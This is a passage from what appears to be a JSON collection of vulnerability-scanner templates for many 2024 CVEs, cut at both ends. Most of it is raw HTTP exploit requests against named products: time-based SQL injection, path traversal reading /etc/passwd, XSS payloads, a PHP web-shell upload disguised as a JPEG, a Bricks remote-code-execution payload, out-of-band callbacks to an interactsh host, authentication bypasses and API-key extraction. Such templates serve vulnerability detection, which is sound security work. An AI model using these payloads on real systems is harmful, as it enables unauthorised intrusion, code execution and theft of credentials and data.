name=\"mobile\"\n\n\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"phone2\"\n\n\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"registration_number\"\n\n\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"locations_id\"\n\n0\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"use_mode\"\n\n0\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"_reset_api_token\"\n\n0\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"update\"\n\nSave\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K--\n"],"matchers":[{"type":"dsl","dsl":["status_code == 302"],"condition":"and","internal":true}]},{"raw":["GET /front/preference.php HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","name":"csrf3","part":"body","group":1,"regex":["type=\"hidden\" name=\"_glpi_csrf_token\" value=\"(.*?)\""],"internal":true}]},{"raw":["POST /ajax/pin_savedsearches.php HTTP/1.1\nHost: {{Hostname}}\nX-Glpi-Csrf-Token: {{csrf3}}\nX-Requested-With: XMLHttpRequest\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nitemtype=Monitor\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body,\"\\\"success\\\":true\")"],"condition":"and","internal":true}]},{"raw":["GET /ajax/common.tabs.php?_glpi_tab=User%241&main_class=tab_cadre_fixe&_target=%2Fglpi%2Ffront%2Fpreference.php&_itemtype=Preference&id=0 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body,\"name=\\\"_api_token\\\" value=\\\"{{randstr}}\")"],"condition":"and"}]}]},{"id":"CVE-2024-7928","info":{"name":"FastAdmin < V1.3.4.20220530 - Path Traversal","severity":"medium"},"requests":[{"raw":["GET /index/ajax/lang?lang=../../application/database HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["jsonpReturn(","\"password\":","\"username\":","\"database\":"],"condition":"and"},{"type":"word","part":"content_type","words":["application/javascript"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-6845","info":{"name":"SmartSearchWP < 2.4.6 - OpenAI Key Disclosure","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"/wp-content/plugins/smartsearchwp\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["POST /wp-json/wdgpt/v1/api-key HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"key\": \"U2FsdGVkX1+X\"}\n"],"matchers":[{"type":"dsl","dsl":["contains(content_type,\"application/json\")","status_code == 200"],"condition":"and"}],"extractors":[{"type":"regex","part":"body","name":"api-key","regex":["\"([^\"]+)\""]}]}]},{"id":"CVE-2024-6517","info":{"name":"Contact Form 7 Math Captcha <= 2.0.1 - Cross-site Scripting","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"/wp-content/plugins/ds-cf7-math-captcha\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=dscf7_refreshcaptcha&tagname=\"<script>alert(document.domain)</script>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"<script>alert(document.domain)</script>"]},{"type":"word","part":"content_type","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-6188","info":{"name":"TrakSYS 11.x.x - Sensitive Data Exposure","severity":"medium"},"requests":[{"raw":["GET /TS/export/pagedefinition?ID=1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["TrakSYS Version","Name","Altname"],"condition":"and"},{"type":"word","part":"content_type","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-25735","info":{"name":"WyreStorm Apollo VX20 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/device/config"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"password\":","\"softAp\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-6028","info":{"name":"Quiz Maker <= 6.5.8.3 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 25s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nays_quiz_id=1&ays_quiz_questions=1,2,3&quiz_id=1&ays_questions[ays-question-4)+or+sleep(if(1>0,6,0)]=&action=ays_finish_quiz\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains_all(body,\"status\\\":\",\"scoreMessage\",\"displayScore\")"],"condition":"and"}]}]},{"id":"CVE-2024-8181","info":{"name":"Flowise <= 1.8.2 Authentication Bypass","severity":"high"},"requests":[{"raw":["GET /api/v1/apikey?/api/v1/ping HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/plain, */*\nReferer: {{RootURL}}/document-stores\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["apiKey","apiSecret"],"condition":"and"},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"apiKey","part":"body","internal":false,"group":1,"regex":["\"apiKey\":\"([^\"]+)\""]}]}]},{"id":"CVE-2024-0713","info":{"name":"Monitorr Services Configuration - Arbitrary File Upload","severity":"high"},"requests":[{"raw":["POST /assets/php/upload.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryaquxwjsn\n\n------WebKitFormBoundaryaquxwjsn\nContent-Disposition: form-data; name=\"fileToUpload\"; filename=\"{{file}}.php\"\nContent-Type: image/jpeg\n\n{{base64_decode('/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL/wAARCAABAAEDASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREAAgECBAQDBAcFBAQAAQJ3AAECAxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwD5/ooooA//2Tw/cGhwIGVjaG8gJ3h4eHh4eGF0ZmVyc290Zyc7Pz4=')}}\n------WebKitFormBoundaryaquxwjsn--\n"],"matchers":[{"type":"word","part":"body","internal":true,"words":["has been uploaded to:"]}]},{"raw":["GET /assets/data/usrimg/{{file}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["atfersotg"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-0881","info":{"name":"Combo Blocks < 2.2.76 - Improper Access Control","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/user-meta/readme.txt"],"matchers":[{"type":"word","internal":true,"words":["User Profile Builder"]}]},{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=post_grid_paginate_ajax_free","{{BaseURL}}/wp-admin/admin-ajax.php?action=post_grid_ajax_search_free"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["{\"html\"","\"<div class=","\"pagination\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-25600","info":{"name":"Unauthenticated Remote Code Execution \u2013 Bricks <= 1.9.6","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-json/bricks/v1/render_element HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n  \"postId\": \"1\",\n  \"nonce\": \"{{nonce}}\",\n  \"element\": {\n    \"name\": \"container\",\n    \"settings\": {\n      \"hasLoop\": \"true\",\n      \"query\": {\n        \"useQueryEditor\": true,\n        \"queryEditor\": \"ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);\",\n        \"objectType\": \"post\"\n      }\n    }\n  }\n}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["Exception:","uid=([0-9(a-z-)]+) gid=([0-9(a-z-)]+) groups=([0-9(a-z-)]+)"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","part":"body","group":1,"regex":["nonce\":\"([0-9a-z]+)"],"internal":true}]}]},{"id":"CVE-2024-6842","info":{"name":"AnythingLLM - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/setup-complete"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains_all(body, \"AuthToken\\\":true\", \"ApiKey\\\":true\")","contains(header, \"application/json\")","status_code == 200"],"condition":"and"},{"type":"word","part":"body","words":["\"AgentGoogleSearchEngineId\":","-\"AgentGoogleSearchEngineKey\":'","\"AgentSerperApiKey\":","\"AgentBingSearchApiKey\":"],"condition":"or"}]}]},{"id":"CVE-2024-6911","info":{"name":"PerkinElmer ProcessPlus <= 1.11.6507.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /ProcessPlus HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"<title>Process Plus - Perten Instruments</title>\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /ProcessPlus/Log/Download/?filename=..\\..\\..\\..\\..\\..\\Windows\\win.ini HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"bit app support\",\"fonts\",\"extensions\")","contains(content_type, \"text/plain\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-39903","info":{"name":"Solara <1.35.1 - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /static/nbextensions/#/../../../../../../../../../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"regex","part":"content_type","regex":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-5765","info":{"name":"WpStickyBar <= 2.1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["contains(body, \"/plugins/wpstickybar-sticky-bar-sticky-header\")"],"internal":true}]},{"raw":["@timeout: 15s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=stickybar_display&banner_id=1%20AND%20SLEEP(6);\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2024-37032","info":{"name":"Ollama - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /api/pull HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"name\": \"http://{{interactsh-url}}/rogue/{{randstr}}\", \"insecure\": true}\n","POST /api/push HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"name\": \"http://{{interactsh-url}}/rogue/{{randstr}}\", \"insecure\": true}\n"],"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, 'http')","contains_all(header, 'application/x-ndjson') && contains(body_2, 'retrieving manifest')"],"condition":"and"}]}]},{"id":"CVE-2024-5084","info":{"name":"Hash Form <= 1.1.0 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["GET / HTTP /1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","POST /wp-admin/admin-ajax.php?action=hashform_file_upload_action&file_uploader_nonce={{nonce}}&allowedExtensions%5B0%5D=txt&sizeLimit=1048576&qqfile={{filename}}.txt HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{{md5(num)}}\n","GET /wp-content/uploads/hashform/temp/{{filename}}.txt HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body_2,\"success\",\"true\",\"url\") && status_code_2 == 200","contains(body_3,\"{{md5(num)}}\") && status_code_3 == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","part":"body","group":1,"regex":["\"ajax_nounce\":\"([0-9a-z]+)\",\"preview_img"],"internal":true}]}]},{"id":"CVE-2024-26331","info":{"name":"ReCrystallize Server - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/Admin/Admin.aspx"],"headers":{"Cookie":"AdminUsername=admin"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["ReCrystallize Server Administration","License Status:","System Info</a>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-21650","info":{"name":"XWiki < 4.10.20 - Remote code execution","severity":"critical"},"requests":[{"raw":["GET {{path}}/bin/register/XWiki/XWikiRegister?xredirect=%2Fbin%2Fregister%2FXWiki%2FXWikiRegister%3Fxredirect%3D%252Fbin%252Fregister%252FXWiki%252FXWikiRegister%253Fxredirect%253D%25252Fxwiki%25252Fbin%25252Fview%25252FScheduler%25252F%25253Fdo%25253Dtrigger%252526which%25253DScheduler.NotificationEmailDailySender HTTP/1.1\nHost: {{Hostname}}\n","POST {{path}}/bin/register/XWiki/XWikiRegister?xredirect=%2Fbin%2Fregister%2FXWiki%2FXWikiRegister%3Fxredirect%3D%252Fxwiki%252Fbin%252Fview%252FScheduler%252F%253Fdo%253Dtrigger%2526which%253DScheduler.NotificationEmailDailySender HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nparent=xwiki%3AMain.UserDirectory&register_first_name={{firstname}}&register_last_name={{lastname}}&xwikiname={{user}}&register_password={{pass}}&register2_password={{pass}}&register_email=\"{{randstr}}%40{{rand_base(5)}}.com&xredirect=%2Fbin%2Fregister%2FXWiki%2FXWikiRegister%3Fxredirect%3D%252Fxwiki%252Fbin%252Fview%252FScheduler%252F%253Fdo%253Dtrigger%2526which%253DScheduler.NotificationEmailDailySender&form_token={{token}}\n"],"payloads":{"path":[null,"/xwiki"]},"stop-at-first-match":true,"host-redirects":true,"max-redirects":2,"skip-variables-check":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["Registration successful","Attack succeeded","Failed to execute the [groovy]"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","part":"body","name":"token","group":1,"regex":["data\\-xwiki\\-form\\-token=\"([a-zA-Z0-9]+)\">"],"internal":true}]}]},{"id":"CVE-2024-0204","info":{"name":"Fortra GoAnywhere MFT - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/goanywhere/images/..;/wizard/InitialAccountSetup.xhtml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Create an administrator account","goanywhere"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-45195","info":{"name":"Apache OFBiz - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /webtools/control/forgotPassword/xmldsdump HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\noutpath=./themes/common-theme/webapp/common-theme/&maxrecords=&filename={{filename}}.txt&entityFrom_i18n=&entityFrom=&entityThru_i18n=&entityThru=&entitySyncId=&preConfiguredSetName=&entityName=UserLogin&entityName=CreditCard\n","GET /common/{{filename}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["<?xml version=","entity-engine-xml"],"condition":"and"},{"type":"word","part":"content_type_2","words":["text/plain"]}]}]},{"id":"CVE-2024-1183","info":{"name":"Gradio - Server Side Request Forgery","severity":"medium"},"requests":[{"raw":["GET /file=http://oast.pro HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"regex","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.pro.*$"],"part":"header"}]}]},{"id":"CVE-2024-28987","info":{"name":"SolarWinds Web Help Desk - Hardcoded Credential","severity":"critical"},"requests":[{"raw":["GET /helpdesk/WebObjects/Helpdesk.woa/ra/OrionTickets/ HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic {{base64(username+':'+password)}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["displayClient","shortDetail"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-4040","info":{"name":"CrushFTP VFS - Sandbox Escape LFR","severity":"critical"},"requests":[{"id":"unauth-exploit","raw":["GET /WebInterface/ HTTP/1.1\nHost: {{Hostname}}\n","POST /WebInterface/function/?command=zip&c2f={{auth}}&path=<INCLUDE>/etc/passwd</INCLUDE>&names=/bbb HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["root:x:"]},{"type":"word","part":"header","words":["text/xml"]}],"extractors":[{"type":"regex","name":"auth","internal":true,"part":"header_1","group":1,"regex":["currentAuth=([0-9a-zA-Z]+)"]}]},{"id":"login","raw":["GET /WebInterface/ HTTP/1.1\nHost: {{Hostname}}\n","POST /WebInterface/function/ HTTP/1.1\nHost: {{Hostname}}\nContent-Length: 111\nOrigin: {{RootURL}}\nReferer: http://{{RootURL}}/WebInterface/login.html\n\ncommand=login&username={{username}}&password={{password}}&encoded=true&language=en&random=0.34712915617878926\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","internal":true,"words":["<response>success</response>"]},{"type":"word","part":"header_2","internal":true,"words":["text/xml"]}],"extractors":[{"type":"regex","name":"auth","internal":true,"part":"header_2","group":1,"regex":["currentAuth=([0-9a-zA-Z]+)"]}]},{"id":"auth-exploit","raw":["POST /WebInterface/function/?command=zip&c2f={{auth}}&path=<INCLUDE>/etc/passwd</INCLUDE>&names=/bbb HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["root:x:"]}]}]},{"id":"CVE-2024-36683","info":{"name":"PrestaShop productsalert - SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":3,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains_any(tolower(body), \"productsalert\", \"prestashop\")"],"condition":"and","internal":true}]},{"raw":["@timeout: 30s\nPOST /modules/productsalert/pasubmit.php?submitpa&redirect_to=https://{{Hostname}}&type=2 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncid=0&idl=6&option=2&pa_option=96119&paemail=1' AND (SELECT 2692 FROM (SELECT(SLEEP(5)))IuFA) AND 'pAlk'='pAlk&pasubmit=Crea%20un%20nuovo%20messaggio%20di%20notifica&pid=13158\n","@timeout: 30s\nPOST /module/productsalert/AjaxProcess HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncid=0&idl=6&option=2&pa_option=96119&paemail=1' AND (SELECT 2692 FROM (SELECT(SLEEP(5)))IuFA) AND 'pAlk'='pAlk&pid=13158\n"],"stop-at-first-match":true,"host-redirects":true,"matchers":[{"type":"dsl","name":"time-based","dsl":["duration_1>=5","duration_2>=5"]}]}]},{"id":"CVE-2024-6095","info":{"name":"LocalAI - Partial Local File Read","severity":"medium"},"requests":[{"raw":["POST /models/apply HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"url\":\"file:///etc/passwd\"}\n"],"extractors":[{"type":"json","part":"body","name":"uuid","internal":true,"json":[".uuid"]}]},{"raw":["GET /models/jobs/{{uuid}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[": cannot unmarshal !!str `root:x:...`"]},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-6924","info":{"name":"TrueBooker <= 1.0.2 - SQL Injection","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, \"/wp-content/plugins/truebooker-appointment-booking\")"],"internal":true}]},{"raw":["@timeout 20s\nPOST /wp-content/plugins/truebooker-appointment-booking/main/truebooker-service-price.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ntba_service_id=(SLEEP(6))\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-34102","info":{"name":"Adobe Commerce & Magento - CosmicSting","severity":"critical"},"requests":[{"raw":["POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"address\":{\"totalsCollector\":{\"collectorList\":{\"totalCollector\":{\"sourceData\":{\"data\":\"http://{{interactsh-url}}/xxe.xml\",\"dataIsURL\":true,\"options\":12345678}}}}}}\n"],"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, \"dns\")","contains(content_type, \"application/json\")","contains_any(body, \"log file\", \"cartId\", \"no Route\")","contains(body, \"message\")"],"condition":"and"}]}]},{"id":"CVE-2024-41810","info":{"name":"Twisted - Open Redirect & XSS","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"redirects":true,"matchers":[{"type":"word","part":"response","words":["TWISTED_SESSION","[\"Twisted"],"internal":true}]},{"method":"GET","path":["{{BaseURL}}?url=ws://example.com/\"><script>alert(document.domain)</script>"],"redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"response","words":["Location: ws://example.com/\"><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2024-27497","info":{"name":"Linksys E2000 1.0.06 position.js Improper Authentication","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/position.js"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var session_key","close_session","HELPPATH"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-27292","info":{"name":"Docassemble - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/interview?i=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[501]}]}]},{"id":"CVE-2024-24919","info":{"name":"Check Point Quantum Gateway - Information Disclosure","severity":"high"},"requests":[{"raw":["POST /clients/MyCRL HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip\n\naCSHELL/../../../../../../../etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*","nobody:.*"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-2340","info":{"name":"Avada < 7.11.7 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/uploads/fusion-forms/"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["<title>Index of [\\s\\S]*title>","fusion"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-32640","info":{"name":"Mura/Masa CMS - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nobject=displayregion&contenthistid=x\\'&previewid=1\n"],"matchers":[{"type":"dsl","dsl":["status_code == 500","contains(header, \"application/json\")","contains_all(body, \"Unhandled Exception\")","contains_all(header,\"cfid\",\"cftoken\")"],"condition":"and"}]}]},{"id":"CVE-2024-33605","info":{"name":"Sharp Multifunction Printers - Directory Listing","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/installed_emanual_list.html"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["ServiceEmanualList","/installed_emanual_down.html"],"condition":"and"},{"type":"word","part":"header","words":["Set-Cookie: MFPSESSIONID="]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-24131","info":{"name":"SuperWebMailer 9.31.0.01799 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/api.php/<script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","SuperWebMailerAPI"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-0352","info":{"name":"Likeshop < 2.5.7.20210311 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /api/file/formimage HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei\nUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36\n\n------WebKitFormBoundarygcflwtei\nContent-Disposition: form-data; name=\"file\";filename=\"{{filename}}.php\"\nContent-Type: application/x-php\n\n{{randstr}}\n------WebKitFormBoundarygcflwtei--\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"\\\"name\\\":\\\"{{filename}}.php\\\"\")","contains_all(body, \"code\\\":1\", \"base_url\\\":\\\"uploads\\\\/user\")"],"condition":"and"}],"extractors":[{"type":"json","part":"body","json":[".data.url"]}]}]},{"id":"CVE-2024-7008","info":{"name":"Calibre <= 7.15.0 - Reflected Cross-Site Scripting (XSS)","severity":"medium"},"requests":[{"raw":["GET /browse/book/TEST&quot;;window.stop();alert(document.domain);%2f%2f HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["window.location.href = \"/#book_id=TEST\";window.stop();alert(document.domain);//&panel=book_details"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-1061","info":{"name":"WordPress HTML5 Video Player - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nGET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","contains(header, \"application/json\")","contains_all(body, \"created_at\", \"video_id\")"],"condition":"and"}]}]},{"id":"CVE-2024-5230","info":{"name":"FleetCart 4.1.1 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/en/products?query=123"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains_all(body, \"razorpayKeyId:\", \"loggedIn:\", \"storeName:\")","status_code == 200"],"condition":"and"},{"type":"word","words":["razorpayKeyId: ''"],"negative":true}]}]},{"id":"CVE-2024-33288","info":{"name":"Prison Management System - SQL Injection Authentication Bypass","severity":"high"},"requests":[{"raw":["POST /Admin/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ntxtusername=admin%27+or+%271%27+%3D%271&txtpassword={{randstr}}&btnlogin=\n","GET /Admin/index.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["<p>Change Password</p>","<p>Logout</p>","Admin Dashboard | Prison Management system"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-5488","info":{"name":"SEOPress < 7.9 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["PUT /wp-json/seopress/v1/posts/1/title-description-metas HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["Sorry, you are not allowed to do that."],"internal":true}]},{"raw":["PUT /wp-json/seopress/v1/posts/1/title-description-metas HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic {{base64(username+':aaaaaa')}}\nContent-Type: application/x-www-form-urlencoded\n\ntitle={{marker}}&description={{marker}}\n"],"matchers":[{"type":"word","part":"body","words":["\"code\":\"success\""],"internal":true}]},{"raw":["GET /wp-json/seopress/v1/posts/1/title-description-metas HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["\"title\":\"{{marker}}\",\"description\":\"{{marker}}\""]}]}]},{"id":"CVE-2024-29269","info":{"name":"Telesquare 